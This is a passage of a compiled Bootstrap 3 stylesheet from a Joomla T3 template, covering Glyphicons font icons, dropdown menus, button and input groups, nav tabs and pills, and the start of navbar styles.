  src: url('../../../../../../plugins/system/t3/base-bs3/bootstrap/fonts/glyphicons-halflings-regular.eot?#iefix') format('embedded-opentype'), url('../../../../../../plugins/system/t3/base-bs3/bootstrap/fonts/glyphicons-halflings-regular.woff2') format('woff2'), url('../../../../../../plugins/system/t3/base-bs3/bootstrap/fonts/glyphicons-halflings-regular.woff') format('woff'), url('../../../../../../plugins/system/t3/base-bs3/bootstrap/fonts/glyphicons-halflings-regular.ttf') format('truetype'), url('../../../../../../plugins/system/t3/base-bs3/bootstrap/fonts/glyphicons-halflings-regular.svg#glyphicons_halflingsregular') format('svg');
}
.glyphicon {
  position: relative;
  top: 1px;
  display: inline-block;
  font-family: 'Glyphicons Halflings';
  font-style: normal;
  font-weight: normal;
  line-height: 1;
  -webkit-font-smoothing: antialiased;
  -moz-osx-font-smoothing: grayscale;
}
.glyphicon-asterisk:before {
  content: "\2a";
}
.glyphicon-plus:before {
  content: "\2b";
}
.glyphicon-euro:before,
.glyphicon-eur:before {
  content: "\20ac";
}
.glyphicon-minus:before {
  content: "\2212";
}
.glyphicon-cloud:before {
  content: "\2601";
}
.glyphicon-envelope:before {
  content: "\2709";
}
.glyphicon-pencil:before {
  content: "\270f";
}
.glyphicon-glass:before {
  content: "\e001";
}
.glyphicon-music:before {
  content: "\e002";
}
.glyphicon-search:before {
  content: "\e003";
}
.glyphicon-heart:before {
  content: "\e005";
}
.glyphicon-star:before {
  content: "\e006";
}
.glyphicon-star-empty:before {
  content: "\e007";
}
.glyphicon-user:before {
  content: "\e008";
}
.glyphicon-film:before {
  content: "\e009";
}
.glyphicon-th-large:before {
  content: "\e010";
}
.glyphicon-th:before {
  content: "\e011";
}
.glyphicon-th-list:before {
  content: "\e012";
}
.glyphicon-ok:before {
  content: "\e013";
}
.glyphicon-remove:before {
  content: "\e014";
}
.glyphicon-zoom-in:before {
  content: "\e015";
}
.glyphicon-zoom-out:before {
  content: "\e016";
}
.glyphicon-off:before {
  content: "\e017";
}
.glyphicon-signal:before {
  content: "\e018";
}
.glyphicon-cog:before {
  content: "\e019";
}
.glyphicon-trash:before {
  content: "\e020";
}
.glyphicon-home:before {
  content: "\e021";
}
.glyphicon-file:before {
  content: "\e022";
}
.glyphicon-time:before {
  content: "\e023";
}
.glyphicon-road:before {
  content: "\e024";
}
.glyphicon-download-alt:before {
  content: "\e025";
}
.glyphicon-download:before {
  content: "\e026";
}
.glyphicon-upload:before {
  content: "\e027";
}
.glyphicon-inbox:before {
  content: "\e028";
}
.glyphicon-play-circle:before {
  content: "\e029";
}
.glyphicon-repeat:before {
  content: "\e030";
}
.glyphicon-refresh:before {
  content: "\e031";
}
.glyphicon-list-alt:before {
  content: "\e032";
}
.glyphicon-lock:before {
  content: "\e033";
}
.glyphicon-flag:before {
  content: "\e034";
}
.glyphicon-headphones:before {
  content: "\e035";
}
.glyphicon-volume-off:before {
  content: "\e036";
}
.glyphicon-volume-down:before {
  content: "\e037";
}
.glyphicon-volume-up:before {
  content: "\e038";
}
.glyphicon-qrcode:before {
  content: "\e039";
}
.glyphicon-barcode:before {
  content: "\e040";
}
.glyphicon-tag:before {
  content: "\e041";
}
.glyphicon-tags:before {
  content: "\e042";
}
.glyphicon-book:before {
  content: "\e043";
}
.glyphicon-bookmark:before {
  content: "\e044";
}
.glyphicon-print:before {
  content: "\e045";
}
.glyphicon-camera:before {
  content: "\e046";
}
.glyphicon-font:before {
  content: "\e047";
}
.glyphicon-bold:before {
  content: "\e048";
}
.glyphicon-italic:before {
  content: "\e049";
}
.glyphicon-text-height:before {
  content: "\e050";
}
.glyphicon-text-width:before {
  content: "\e051";
}
.glyphicon-align-left:before {
  content: "\e052";
}
.glyphicon-align-center:before {
  content: "\e053";
}
.glyphicon-align-right:before {
  content: "\e054";
}
.glyphicon-align-justify:before {
  content: "\e055";
}
.glyphicon-list:before {
  content: "\e056";
}
.glyphicon-indent-left:before {
  content: "\e057";
}
.glyphicon-indent-right:before {
  content: "\e058";
}
.glyphicon-facetime-video:before {
  content: "\e059";
}
.glyphicon-picture:before {
  content: "\e060";
}
.glyphicon-map-marker:before {
  content: "\e062";
}
.glyphicon-adjust:before {
  content: "\e063";
}
.glyphicon-tint:before {
  content: "\e064";
}
.glyphicon-edit:before {
  content: "\e065";
}
.glyphicon-share:before {
  content: "\e066";
}
.glyphicon-check:before {
  content: "\e067";
}
.glyphicon-move:before {
  content: "\e068";
}
.glyphicon-step-backward:before {
  content: "\e069";
}
.glyphicon-fast-backward:before {
  content: "\e070";
}
.glyphicon-backward:before {
  content: "\e071";
}
.glyphicon-play:before {
  content: "\e072";
}
.glyphicon-pause:before {
  content: "\e073";
}
.glyphicon-stop:before {
  content: "\e074";
}
.glyphicon-forward:before {
  content: "\e075";
}
.glyphicon-fast-forward:before {
  content: "\e076";
}
.glyphicon-step-forward:before {
  content: "\e077";
}
.glyphicon-eject:before {
  content: "\e078";
}
.glyphicon-chevron-left:before {
  content: "\e079";
}
.glyphicon-chevron-right:before {
  content: "\e080";
}
.glyphicon-plus-sign:before {
  content: "\e081";
}
.glyphicon-minus-sign:before {
  content: "\e082";
}
.glyphicon-remove-sign:before {
  content: "\e083";
}
.glyphicon-ok-sign:before {
  content: "\e084";
}
.glyphicon-question-sign:before {
  content: "\e085";
}
.glyphicon-info-sign:before {
  content: "\e086";
}
.glyphicon-screenshot:before {
  content: "\e087";
}
.glyphicon-remove-circle:before {
  content: "\e088";
}
.glyphicon-ok-circle:before {
  content: "\e089";
}
.glyphicon-ban-circle:before {
  content: "\e090";
}
.glyphicon-arrow-left:before {
  content: "\e091";
}
.glyphicon-arrow-right:before {
  content: "\e092";
}
.glyphicon-arrow-up:before {
  content: "\e093";
}
.glyphicon-arrow-down:before {
  content: "\e094";
}
.glyphicon-share-alt:before {
  content: "\e095";
}
.glyphicon-resize-full:before {
  content: "\e096";
}
.glyphicon-resize-small:before {
  content: "\e097";
}
.glyphicon-exclamation-sign:before {
  content: "\e101";
}
.glyphicon-gift:before {
  content: "\e102";
}
.glyphicon-leaf:before {
  content: "\e103";
}
.glyphicon-fire:before {
  content: "\e104";
}
.glyphicon-eye-open:before {
  content: "\e105";
}
.glyphicon-eye-close:before {
  content: "\e106";
}
.glyphicon-warning-sign:before {
  content: "\e107";
}
.glyphicon-plane:before {
  content: "\e108";
}
.glyphicon-calendar:before {
  content: "\e109";
}
.glyphicon-random:before {
  content: "\e110";
}
.glyphicon-comment:before {
  content: "\e111";
}
.glyphicon-magnet:before {
  content: "\e112";
}
.glyphicon-chevron-up:before {
  content: "\e113";
}
.glyphicon-chevron-down:before {
  content: "\e114";
}
.glyphicon-retweet:before {
  content: "\e115";
}
.glyphicon-shopping-cart:before {
  content: "\e116";
}
.glyphicon-folder-close:before {
  content: "\e117";
}
.glyphicon-folder-open:before {
  content: "\e118";
}
.glyphicon-resize-vertical:before {
  content: "\e119";
}
.glyphicon-resize-horizontal:before {
  content: "\e120";
}
.glyphicon-hdd:before {
  content: "\e121";
}
.glyphicon-bullhorn:before {
  content: "\e122";
}
.glyphicon-bell:before {
  content: "\e123";
}
.glyphicon-certificate:before {
  content: "\e124";
}
.glyphicon-thumbs-up:before {
  content: "\e125";
}
.glyphicon-thumbs-down:before {
  content: "\e126";
}
.glyphicon-hand-right:before {
  content: "\e127";
}
.glyphicon-hand-left:before {
  content: "\e128";
}
.glyphicon-hand-up:before {
  content: "\e129";
}
.glyphicon-hand-down:before {
  content: "\e130";
}
.glyphicon-circle-arrow-right:before {
  content: "\e131";
}
.glyphicon-circle-arrow-left:before {
  content: "\e132";
}
.glyphicon-circle-arrow-up:before {
  content: "\e133";
}
.glyphicon-circle-arrow-down:before {
  content: "\e134";
}
.glyphicon-globe:before {
  content: "\e135";
}
.glyphicon-wrench:before {
  content: "\e136";
}
.glyphicon-tasks:before {
  content: "\e137";
}
.glyphicon-filter:before {
  content: "\e138";
}
.glyphicon-briefcase:before {
  content: "\e139";
}
.glyphicon-fullscreen:before {
  content: "\e140";
}
.glyphicon-dashboard:before {
  content: "\e141";
}
.glyphicon-paperclip:before {
  content: "\e142";
}
.glyphicon-heart-empty:before {
  content: "\e143";
}
.glyphicon-link:before {
  content: "\e144";
}
.glyphicon-phone:before {
  content: "\e145";
}
.glyphicon-pushpin:before {
  content: "\e146";
}
.glyphicon-usd:before {
  content: "\e148";
}
.glyphicon-gbp:before {
  content: "\e149";
}
.glyphicon-sort:before {
  content: "\e150";
}
.glyphicon-sort-by-alphabet:before {
  content: "\e151";
}
.glyphicon-sort-by-alphabet-alt:before {
  content: "\e152";
}
.glyphicon-sort-by-order:before {
  content: "\e153";
}
.glyphicon-sort-by-order-alt:before {
  content: "\e154";
}
.glyphicon-sort-by-attributes:before {
  content: "\e155";
}
.glyphicon-sort-by-attributes-alt:before {
  content: "\e156";
}
.glyphicon-unchecked:before {
  content: "\e157";
}
.glyphicon-expand:before {
  content: "\e158";
}
.glyphicon-collapse-down:before {
  content: "\e159";
}
.glyphicon-collapse-up:before {
  content: "\e160";
}
.glyphicon-log-in:before {
  content: "\e161";
}
.glyphicon-flash:before {
  content: "\e162";
}
.glyphicon-log-out:before {
  content: "\e163";
}
.glyphicon-new-window:before {
  content: "\e164";
}
.glyphicon-record:before {
  content: "\e165";
}
.glyphicon-save:before {
  content: "\e166";
}
.glyphicon-open:before {
  content: "\e167";
}
.glyphicon-saved:before {
  content: "\e168";
}
.glyphicon-import:before {
  content: "\e169";
}
.glyphicon-export:before {
  content: "\e170";
}
.glyphicon-send:before {
  content: "\e171";
}
.glyphicon-floppy-disk:before {
  content: "\e172";
}
.glyphicon-floppy-saved:before {
  content: "\e173";
}
.glyphicon-floppy-remove:before {
  content: "\e174";
}
.glyphicon-floppy-save:before {
  content: "\e175";
}
.glyphicon-floppy-open:before {
  content: "\e176";
}
.glyphicon-credit-card:before {
  content: "\e177";
}
.glyphicon-transfer:before {
  content: "\e178";
}
.glyphicon-cutlery:before {
  content: "\e179";
}
.glyphicon-header:before {
  content: "\e180";
}
.glyphicon-compressed:before {
  content: "\e181";
}
.glyphicon-earphone:before {
  content: "\e182";
}
.glyphicon-phone-alt:before {
  content: "\e183";
}
.glyphicon-tower:before {
  content: "\e184";
}
.glyphicon-stats:before {
  content: "\e185";
}
.glyphicon-sd-video:before {
  content: "\e186";
}
.glyphicon-hd-video:before {
  content: "\e187";
}
.glyphicon-subtitles:before {
  content: "\e188";
}
.glyphicon-sound-stereo:before {
  content: "\e189";
}
.glyphicon-sound-dolby:before {
  content: "\e190";
}
.glyphicon-sound-5-1:before {
  content: "\e191";
}
.glyphicon-sound-6-1:before {
  content: "\e192";
}
.glyphicon-sound-7-1:before {
  content: "\e193";
}
.glyphicon-copyright-mark:before {
  content: "\e194";
}
.glyphicon-registration-mark:before {
  content: "\e195";
}
.glyphicon-cloud-download:before {
  content: "\e197";
}
.glyphicon-cloud-upload:before {
  content: "\e198";
}
.glyphicon-tree-conifer:before {
  content: "\e199";
}
.glyphicon-tree-deciduous:before {
  content: "\e200";
}
.glyphicon-cd:before {
  content: "\e201";
}
.glyphicon-save-file:before {
  content: "\e202";
}
.glyphicon-open-file:before {
  content: "\e203";
}
.glyphicon-level-up:before {
  content: "\e204";
}
.glyphicon-copy:before {
  content: "\e205";
}
.glyphicon-paste:before {
  content: "\e206";
}
.glyphicon-alert:before {
  content: "\e209";
}
.glyphicon-equalizer:before {
  content: "\e210";
}
.glyphicon-king:before {
  content: "\e211";
}
.glyphicon-queen:before {
  content: "\e212";
}
.glyphicon-pawn:before {
  content: "\e213";
}
.glyphicon-bishop:before {
  content: "\e214";
}
.glyphicon-knight:before {
  content: "\e215";
}
.glyphicon-baby-formula:before {
  content: "\e216";
}
.glyphicon-tent:before {
  content: "\26fa";
}
.glyphicon-blackboard:before {
  content: "\e218";
}
.glyphicon-bed:before {
  content: "\e219";
}
.glyphicon-apple:before {
  content: "\f8ff";
}
.glyphicon-erase:before {
  content: "\e221";
}
.glyphicon-hourglass:before {
  content: "\231b";
}
.glyphicon-lamp:before {
  content: "\e223";
}
.glyphicon-duplicate:before {
  content: "\e224";
}
.glyphicon-piggy-bank:before {
  content: "\e225";
}
.glyphicon-scissors:before {
  content: "\e226";
}
.glyphicon-bitcoin:before {
  content: "\e227";
}
.glyphicon-btc:before {
  content: "\e227";
}
.glyphicon-xbt:before {
  content: "\e227";
}
.glyphicon-yen:before {
  content: "\00a5";
}
.glyphicon-jpy:before {
  content: "\00a5";
}
.glyphicon-ruble:before {
  content: "\20bd";
}
.glyphicon-rub:before {
  content: "\20bd";
}
.glyphicon-scale:before {
  content: "\e230";
}
.glyphicon-ice-lolly:before {
  content: "\e231";
}
.glyphicon-ice-lolly-tasted:before {
  content: "\e232";
}
.glyphicon-education:before {
  content: "\e233";
}
.glyphicon-option-horizontal:before {
  content: "\e234";
}
.glyphicon-option-vertical:before {
  content: "\e235";
}
.glyphicon-menu-hamburger:before {
  content: "\e236";
}
.glyphicon-modal-window:before {
  content: "\e237";
}
.glyphicon-oil:before {
  content: "\e238";
}
.glyphicon-grain:before {
  content: "\e239";
}
.glyphicon-sunglasses:before {
  content: "\e240";
}
.glyphicon-text-size:before {
  content: "\e241";
}
.glyphicon-text-color:before {
  content: "\e242";
}
.glyphicon-text-background:before {
  content: "\e243";
}
.glyphicon-object-align-top:before {
  content: "\e244";
}
.glyphicon-object-align-bottom:before {
  content: "\e245";
}
.glyphicon-object-align-horizontal:before {
  content: "\e246";
}
.glyphicon-object-align-left:before {
  content: "\e247";
}
.glyphicon-object-align-vertical:before {
  content: "\e248";
}
.glyphicon-object-align-right:before {
  content: "\e249";
}
.glyphicon-triangle-right:before {
  content: "\e250";
}
.glyphicon-triangle-left:before {
  content: "\e251";
}
.glyphicon-triangle-bottom:before {
  content: "\e252";
}
.glyphicon-triangle-top:before {
  content: "\e253";
}
.glyphicon-console:before {
  content: "\e254";
}
.glyphicon-superscript:before {
  content: "\e255";
}
.glyphicon-subscript:before {
  content: "\e256";
}
.glyphicon-menu-left:before {
  content: "\e257";
}
.glyphicon-menu-right:before {
  content: "\e258";
}
.glyphicon-menu-down:before {
  content: "\e259";
}
.glyphicon-menu-up:before {
  content: "\e260";
}
.caret {
  display: inline-block;
  width: 0;
  height: 0;
  margin-left: 2px;
  vertical-align: middle;
  border-top: 4px dashed;
  border-right: 4px solid transparent;
  border-left: 4px solid transparent;
}
.dropup,
.dropdown {
  position: relative;
}
.dropdown-toggle:focus {
  outline: 0;
}
.dropdown-menu {
  position: absolute;
  top: 100%;
  left: 0;
  z-index: 1000;
  display: none;
  float: left;
  min-width: 160px;
  padding: 5px 0;
  margin: 2px 0 0;
  list-style: none;
  font-size: 14px;
  text-align: left;
  background-color: #444444;
  border: 1px solid #444444;
  border-radius: 0px;
  -webkit-box-shadow: 0 6px 12px rgba(0, 0, 0, 0.175);
  box-shadow: 0 6px 12px rgba(0, 0, 0, 0.175);
  background-clip: padding-box;
}
.dropdown-menu.pull-right {
  right: 0;
  left: auto;
}
.dropdown-menu .divider {
  height: 1px;
  margin: 9px 0;
  overflow: hidden;
  background-color: #515151;
}
.dropdown-menu > li > a {
  display: block;
  padding: 3px 20px;
  clear: both;
  font-weight: normal;
  line-height: 1.42857143;
  color: #999999;
  white-space: nowrap;
}
.dropdown-menu > li > a:hover,
.dropdown-menu > li > a:focus {
  text-decoration: none;
  color: #ffffff;
  background-color: #515151;
}
.dropdown-menu > .active > a,
.dropdown-menu > .active > a:hover,
.dropdown-menu > .active > a:focus {
  color: #ffffff;
  text-decoration: none;
  outline: 0;
  background-color: #373737;
}
.dropdown-menu > .disabled > a,
.dropdown-menu > .disabled > a:hover,
.dropdown-menu > .disabled > a:focus {
  color: #999999;
}
.dropdown-menu > .disabled > a:hover,
.dropdown-menu > .disabled > a:focus {
  text-decoration: none;
  background-color: transparent;
  background-image: none;
  filter: progid:DXImageTransform.Microsoft.gradient(enabled = false);
  cursor: not-allowed;
}
.open > .dropdown-menu {
  display: block;
}
.open > a {
  outline: 0;
}
.dropdown-menu-right {
  left: auto;
  right: 0;
}
.dropdown-menu-left {
  left: 0;
  right: auto;
}
.dropdown-header {
  display: block;
  padding: 3px 20px;
  font-size: 12px;
  line-height: 1.42857143;
  color: #999999;
  white-space: nowrap;
}
.dropdown-backdrop {
  position: fixed;
  left: 0;
  right: 0;
  bottom: 0;
  top: 0;
  z-index: 990;
}
.pull-right > .dropdown-menu {
  right: 0;
  left: auto;
}
.dropup .caret,
.navbar-fixed-bottom .dropdown .caret {
  border-top: 0;
  border-bottom: 4px solid;
  content: "";
}
.dropup .dropdown-menu,
.navbar-fixed-bottom .dropdown .dropdown-menu {
  top: auto;
  bottom: 100%;
  margin-bottom: 2px;
}
@media (min-width: 991px) {
  .navbar-right .dropdown-menu {
    left: auto;
    right: 0;
  }
  .navbar-right .dropdown-menu-left {
    left: 0;
    right: auto;
  }
}
.btn-group,
.btn-group-vertical {
  position: relative;
  display: inline-block;
  vertical-align: middle;
}
.btn-group > .btn,
.btn-group-vertical > .btn {
  position: relative;
  float: left;
}
.btn-group > .btn:hover,
.btn-group-vertical > .btn:hover,
.btn-group > .btn:focus,
.btn-group-vertical > .btn:focus,
.btn-group > .btn:active,
.btn-group-vertical > .btn:active,
.btn-group > .btn.active,
.btn-group-vertical > .btn.active {
  z-index: 2;
}
.btn-group .btn + .btn,
.btn-group .btn + .btn-group,
.btn-group .btn-group + .btn,
.btn-group .btn-group + .btn-group {
  margin-left: -1px;
}
.btn-toolbar {
  margin-left: -5px;
}
.btn-toolbar .btn-group,
.btn-toolbar .input-group {
  float: left;
}
.btn-toolbar > .btn,
.btn-toolbar > .btn-group,
.btn-toolbar > .input-group {
  margin-left: 5px;
}
.btn-group > .btn:not(:first-child):not(:last-child):not(.dropdown-toggle) {
  border-radius: 0;
}
.btn-group > .btn:first-child {
  margin-left: 0;
}
.btn-group > .btn:first-child:not(:last-child):not(.dropdown-toggle) {
  border-bottom-right-radius: 0;
  border-top-right-radius: 0;
}
.btn-group > .btn:last-child:not(:first-child),
.btn-group > .dropdown-toggle:not(:first-child) {
  border-bottom-left-radius: 0;
  border-top-left-radius: 0;
}
.btn-group > .btn-group {
  float: left;
}
.btn-group > .btn-group:not(:first-child):not(:last-child) > .btn {
  border-radius: 0;
}
.btn-group > .btn-group:first-child:not(:last-child) > .btn:last-child,
.btn-group > .btn-group:first-child:not(:last-child) > .dropdown-toggle {
  border-bottom-right-radius: 0;
  border-top-right-radius: 0;
}
.btn-group > .btn-group:last-child:not(:first-child) > .btn:first-child {
  border-bottom-left-radius: 0;
  border-top-left-radius: 0;
}
.btn-group .dropdown-toggle:active,
.btn-group.open .dropdown-toggle {
  outline: 0;
}
.btn-group > .btn + .dropdown-toggle {
  padding-left: 8px;
  padding-right: 8px;
}
.btn-group > .btn-lg + .dropdown-toggle {
  padding-left: 12px;
  padding-right: 12px;
}
.btn-group.open .dropdown-toggle {
  -webkit-box-shadow: inset 0 3px 5px rgba(0, 0, 0, 0.125);
  box-shadow: inset 0 3px 5px rgba(0, 0, 0, 0.125);
}
.btn-group.open .dropdown-toggle.btn-link {
  -webkit-box-shadow: none;
  box-shadow: none;
}
.btn .caret {
  margin-left: 0;
}
.btn-lg .caret {
  border-width: 5px 5px 0;
  border-bottom-width: 0;
}
.dropup .btn-lg .caret {
  border-width: 0 5px 5px;
}
.btn-group-vertical > .btn,
.btn-group-vertical > .btn-group,
.btn-group-vertical > .btn-group > .btn {
  display: block;
  float: none;
  width: 100%;
  max-width: 100%;
}
.btn-group-vertical > .btn-group > .btn {
  float: none;
}
.btn-group-vertical > .btn + .btn,
.btn-group-vertical > .btn + .btn-group,
.btn-group-vertical > .btn-group + .btn,
.btn-group-vertical > .btn-group + .btn-group {
  margin-top: -1px;
  margin-left: 0;
}
.btn-group-vertical > .btn:not(:first-child):not(:last-child) {
  border-radius: 0;
}
.btn-group-vertical > .btn:first-child:not(:last-child) {
  border-top-right-radius: 0px;
  border-bottom-right-radius: 0;
  border-bottom-left-radius: 0;
}
.btn-group-vertical > .btn:last-child:not(:first-child) {
  border-bottom-left-radius: 0px;
  border-top-right-radius: 0;
  border-top-left-radius: 0;
}
.btn-group-vertical > .btn-group:not(:first-child):not(:last-child) > .btn {
  border-radius: 0;
}
.btn-group-vertical > .btn-group:first-child:not(:last-child) > .btn:last-child,
.btn-group-vertical > .btn-group:first-child:not(:last-child) > .dropdown-toggle {
  border-bottom-right-radius: 0;
  border-bottom-left-radius: 0;
}
.btn-group-vertical > .btn-group:last-child:not(:first-child) > .btn:first-child {
  border-top-right-radius: 0;
  border-top-left-radius: 0;
}
.btn-group-justified {
  display: table;
  width: 100%;
  table-layout: fixed;
  border-collapse: separate;
}
.btn-group-justified > .btn,
.btn-group-justified > .btn-group {
  float: none;
  display: table-cell;
  width: 1%;
}
.btn-group-justified > .btn-group .btn {
  width: 100%;
}
.btn-group-justified > .btn-group .dropdown-menu {
  left: auto;
}
[data-toggle="buttons"] > .btn input[type="radio"],
[data-toggle="buttons"] > .btn-group > .btn input[type="radio"],
[data-toggle="buttons"] > .btn input[type="checkbox"],
[data-toggle="buttons"] > .btn-group > .btn input[type="checkbox"] {
  position: absolute;
  clip: rect(0, 0, 0, 0);
  pointer-events: none;
}
.input-group {
  position: relative;
  display: table;
  border-collapse: separate;
}
.input-group[class*="col-"] {
  float: none;
  padding-left: 0;
  padding-right: 0;
}
.input-group .form-control {
  position: relative;
  z-index: 2;
  float: left;
  width: 100%;
  margin-bottom: 0;
}
.input-group-lg > .form-control,
.input-group-lg > .input-group-addon,
.input-group-lg > .input-group-btn > .btn {
  height: 45px;
  padding: 10px 16px;
  font-size: 18px;
  line-height: 1.33;
  border-radius: 0px;
}
select.input-group-lg > .form-control,
select.input-group-lg > .input-group-addon,
select.input-group-lg > .input-group-btn > .btn {
  height: 45px;
  line-height: 45px;
}
textarea.input-group-lg > .form-control,
textarea.input-group-lg > .input-group-addon,
textarea.input-group-lg > .input-group-btn > .btn,
select[multiple].input-group-lg > .form-control,
select[multiple].input-group-lg > .input-group-addon,
select[multiple].input-group-lg > .input-group-btn > .btn {
  height: auto;
}
.input-group-sm > .form-control,
.input-group-sm > .input-group-addon,
.input-group-sm > .input-group-btn > .btn {
  height: 30px;
  padding: 5px 10px;
  font-size: 12px;
  line-height: 1.5;
  border-radius: 0px;
}
select.input-group-sm > .form-control,
select.input-group-sm > .input-group-addon,
select.input-group-sm > .input-group-btn > .btn {
  height: 30px;
  line-height: 30px;
}
textarea.input-group-sm > .form-control,
textarea.input-group-sm > .input-group-addon,
textarea.input-group-sm > .input-group-btn > .btn,
select[multiple].input-group-sm > .form-control,
select[multiple].input-group-sm > .input-group-addon,
select[multiple].input-group-sm > .input-group-btn > .btn {
  height: auto;
}
.input-group-addon,
.input-group-btn,
.input-group .form-control {
  display: table-cell;
}
.input-group-addon:not(:first-child):not(:last-child),
.input-group-btn:not(:first-child):not(:last-child),
.input-group .form-control:not(:first-child):not(:last-child) {
  border-radius: 0;
}
.input-group-addon,
.input-group-btn {
  width: 1%;
  white-space: nowrap;
  vertical-align: middle;
}
.input-group-addon {
  padding: 6px 12px;
  font-size: 14px;
  font-weight: normal;
  line-height: 1;
  color: #666666;
  text-align: center;
  background-color: #eeeeee;
  border: 1px solid #cccccc;
  border-radius: 0px;
}
.input-group-addon.input-sm {
  padding: 5px 10px;
  font-size: 12px;
  border-radius: 0px;
}
.input-group-addon.input-lg {
  padding: 10px 16px;
  font-size: 18px;
  border-radius: 0px;
}
.input-group-addon input[type="radio"],
.input-group-addon input[type="checkbox"] {
  margin-top: 0;
}
.input-group .form-control:first-child,
.input-group-addon:first-child,
.input-group-btn:first-child > .btn,
.input-group-btn:first-child > .btn-group > .btn,
.input-group-btn:first-child > .dropdown-toggle,
.input-group-btn:last-child > .btn:not(:last-child):not(.dropdown-toggle),
.input-group-btn:last-child > .btn-group:not(:last-child) > .btn {
  border-bottom-right-radius: 0;
  border-top-right-radius: 0;
}
.input-group-addon:first-child {
  border-right: 0;
}
.input-group .form-control:last-child,
.input-group-addon:last-child,
.input-group-btn:last-child > .btn,
.input-group-btn:last-child > .btn-group > .btn,
.input-group-btn:last-child > .dropdown-toggle,
.input-group-btn:first-child > .btn:not(:first-child),
.input-group-btn:first-child > .btn-group:not(:first-child) > .btn {
  border-bottom-left-radius: 0;
  border-top-left-radius: 0;
}
.input-group-addon:last-child {
  border-left: 0;
}
.input-group-btn {
  position: relative;
  font-size: 0;
  white-space: nowrap;
}
.input-group-btn > .btn {
  position: relative;
}
.input-group-btn > .btn + .btn {
  margin-left: -1px;
}
.input-group-btn > .btn:hover,
.input-group-btn > .btn:focus,
.input-group-btn > .btn:active {
  z-index: 2;
}
.input-group-btn:first-child > .btn,
.input-group-btn:first-child > .btn-group {
  margin-right: -1px;
}
.input-group-btn:last-child > .btn,
.input-group-btn:last-child > .btn-group {
  margin-left: -1px;
}
.nav {
  margin-bottom: 0;
  padding-left: 0;
  list-style: none;
}
.nav > li {
  position: relative;
  display: block;
}
.nav > li > a {
  position: relative;
  display: block;
  padding: 10px 15px;
}
.nav > li > a:hover,
.nav > li > a:focus {
  text-decoration: none;
  background-color: #eeeeee;
}
.nav > li.disabled > a {
  color: #999999;
}
.nav > li.disabled > a:hover,
.nav > li.disabled > a:focus {
  color: #999999;
  text-decoration: none;
  background-color: transparent;
  cursor: not-allowed;
}
.nav .open > a,
.nav .open > a:hover,
.nav .open > a:focus {
  background-color: #eeeeee;
  border-color: #cc0000;
}
.nav .nav-divider {
  height: 1px;
  margin: 9px 0;
  overflow: hidden;
  background-color: #e5e5e5;
}
.nav > li > a > img {
  max-width: none;
}
.nav-tabs {
  border-bottom: 1px solid #dddddd;
}
.nav-tabs > li {
  float: left;
  margin-bottom: -1px;
}
.nav-tabs > li > a {
  margin-right: 2px;
  line-height: 1.42857143;
  border: 1px solid transparent;
  border-radius: 0px 0px 0 0;
}
.nav-tabs > li > a:hover {
  border-color: #eeeeee #eeeeee #dddddd;
}
.nav-tabs > li.active > a,
.nav-tabs > li.active > a:hover,
.nav-tabs > li.active > a:focus {
  color: #666666;
  background-color: #ffffff;
  border: 1px solid #dddddd;
  border-bottom-color: transparent;
  cursor: default;
}
.nav-tabs.nav-justified {
  width: 100%;
  border-bottom: 0;
}
.nav-tabs.nav-justified > li {
  float: none;
}
.nav-tabs.nav-justified > li > a {
  text-align: center;
  margin-bottom: 5px;
}
.nav-tabs.nav-justified > .dropdown .dropdown-menu {
  top: auto;
  left: auto;
}
@media (min-width: 768px) {
  .nav-tabs.nav-justified > li {
    display: table-cell;
    width: 1%;
  }
  .nav-tabs.nav-justified > li > a {
    margin-bottom: 0;
  }
}
.nav-tabs.nav-justified > li > a {
  margin-right: 0;
  border-radius: 0px;
}
.nav-tabs.nav-justified > .active > a,
.nav-tabs.nav-justified > .active > a:hover,
.nav-tabs.nav-justified > .active > a:focus {
  border: 1px solid #dddddd;
}
@media (min-width: 768px) {
  .nav-tabs.nav-justified > li > a {
    border-bottom: 1px solid #dddddd;
    border-radius: 0px 0px 0 0;
  }
  .nav-tabs.nav-justified > .active > a,
  .nav-tabs.nav-justified > .active > a:hover,
  .nav-tabs.nav-justified > .active > a:focus {
    border-bottom-color: #ffffff;
  }
}
.nav-pills > li {
  float: left;
}
.nav-pills > li > a {
  border-radius: 0px;
}
.nav-pills > li + li {
  margin-left: 2px;
}
.nav-pills > li.active > a,
.nav-pills > li.active > a:hover,
.nav-pills > li.active > a:focus {
  color: #ffffff;
  background-color: #cc0000;
}
.nav-stacked > li {
  float: none;
}
.nav-stacked > li + li {
  margin-top: 2px;
  margin-left: 0;
}
.nav-justified {
  width: 100%;
}
.nav-justified > li {
  float: none;
}
.nav-justified > li > a {
  text-align: center;
  margin-bottom: 5px;
}
.nav-justified > .dropdown .dropdown-menu {
  top: auto;
  left: auto;
}
@media (min-width: 768px) {
  .nav-justified > li {
    display: table-cell;
    width: 1%;
  }
  .nav-justified > li > a {
    margin-bottom: 0;
  }
}
.nav-tabs-justified {
  border-bottom: 0;
}
.nav-tabs-justified > li > a {
  margin-right: 0;
  border-radius: 0px;
}
.nav-tabs-justified > .active > a,
.nav-tabs-justified > .active > a:hover,
.nav-tabs-justified > .active > a:focus {
  border: 1px solid #dddddd;
}
@media (min-width: 768px) {
  .nav-tabs-justified > li > a {
    border-bottom: 1px solid #dddddd;
    border-radius: 0px 0px 0 0;
  }
  .nav-tabs-justified > .active > a,
  .nav-tabs-justified > .active > a:hover,
  .nav-tabs-justified > .active > a:focus {
    border-bottom-color: #ffffff;
  }
}
.tab-content > .tab-pane {
  display: none;
}
.tab-content > .active {
  display: block;
}
.nav-tabs .dropdown-menu {
  margin-top: -1px;
  border-top-right-radius: 0;
  border-top-left-radius: 0;
}
.navbar {
  position: relative;
  min-height: 55px;
  margin-bottom: 20px;
  border: 1px solid transparent;
}
@media (min-width: 991px) {
  .navbar {
    border-radius: 0px;
  }
}
@media (min-width: 991px) {
  .navbar-header {
    float: left;
  }
}
.navbar-collapse {
  overflow-x: visible;
  padding-right: 15px;
  padding-left: 15px;
  border-top: 1px solid transparent;
  box-shadow: inset 0 1px 0 rgba(255, 255, 255, 0.1);
  -webkit-overflow-scrolling: touch;
}
.navbar-collapse.in {
  overflow-y: auto;
}
@media (min-width: 991px) {
  .navbar-collapse {
    width: auto;
    border-top: 0;
    box-shadow: none;
  }
  .navbar-collapse.collapse {
    display: block !important;
    height: auto !important;
    padding-bottom: 0;
    overflow: visible !important;
  }
  .navbar-collapse.in {
    overflow-y: visible;
  }
  .navbar-fixed-top .navbar-collapse,
  .navbar-static-top .navbar-collapse,
  .navbar-fixed-bottom .navbar-collapse {
    padding-left: 0;
